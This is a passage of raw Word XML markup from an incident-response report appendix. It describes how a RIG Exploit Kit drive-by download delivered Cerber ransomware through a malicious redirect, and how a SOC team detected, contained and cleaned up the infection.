          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406A93EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E599C96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592D09EF">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**Appendix A: Detailed Analysis of the Exploit Kit (EK)**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E67447">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2CBB8C">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In this incident, the attacker used the RIG Exploit Kit to compromise the victim's system. Exploit Kits (EKs) are powerful tools that cybercriminals use to automate the exploitation of vulnerabilities, often in web browsers, plugins, or outdated software. They are usually delivered via compromised websites or malvertising campaigns, and they can deploy a wide variety of malware depending on the attacker's objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D74C52C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1334C23E">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**Story of the Exploit**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E0B3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD42270">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The incident began innocently when a user performed a search for kitchen remodeling ideas using Bing. The user clicked on a link that appeared to lead to the legitimate website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F8E5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D92A5A9">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homeimprovement.com, but was unknowingly redirected to a malicious website controlled by the attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82CA12">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This malicious site used the RIG Exploit Kit to identify and exploit vulnerabilities in the user's web browser. The kit delivered a malicious compressed gzip file containing Cerber ransomware, which would have encrypted the user's system if not for the quick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13134642">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intervention by the SOC team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657AFD95">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The attack was part of a larger, coordinated campaign targeting unsuspecting users through compromised legitimate websites and malicious advertisements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F3264">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="711D0A6E">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>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1. Initial Detection and Analysis of the Incident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02261194">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Date of Incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: January 27, 2017</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097D18BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Detection Method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">: The incident was first detected by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Snort Network Intrusion Detection System (NIDS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">, which generated an alert regarding suspicious HTTP traffic originating from the user's machine (IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>172.16.4.193</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>) directed towards a known malicious IP (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>194.87.234.129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB9E5A4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8D414A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2AA018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Initial Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">: The SOC team analyzed the alerts, identifying the traffic patterns and the URLs involved, leading to the conclusion that a drive-by download attack utilizing an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Exploit Kit (RIG EK)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> had occurred, aimed at delivering </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Cerber ransomware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C813D">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>2. Communication Activities with Stakeholders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06EB86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Stakeholder Notification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: Upon confirmation of the incident, the SOC team promptly communicated with relevant stakeholders, including upper management and the IT department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3786341E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Content of Communication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: The notification included:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A44D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="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Nature of the attack and its potential impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7F625D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="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Immediate actions being taken for containment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED7276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="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Requests for resources or assistance, if necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224CE944">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Public Relations Communication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: Following the incident, the public relations team addressed inquiries from concerned users about potential risks and reassured them regarding the organization's response measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9DABB8">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>3. Containment and Eradication Procedures Implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD19FC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Containment Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63496DC9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EAE7AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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Immediate Isolation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: The compromised system was isolated from the network to prevent further infection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF15AF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC626EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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Blocking Malicious Connections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: Firewall rules were updated to block outbound connections to the malicious IP address and associated domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFEE1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>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Flagging Affected Endpoints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: Affected systems were marked for further investigation and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEEF2B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Eradication Actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1BC41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>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Malware Removal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">: Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Sguil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>, the SOC analysts identified and removed malware from affected hosts using endpoint security tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FFF3C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>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Patch Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: All vulnerable software components were patched to prevent future exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F614D12">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BBC27EF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04384EA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>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Log Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>: Detailed analysis of logs was conducted to identify any indicators of compromise (IoCs) and confirm that no other systems were affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2CF31D">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>4. Recovery Efforts Undertaken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A779911">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Restoration of Systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593812FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
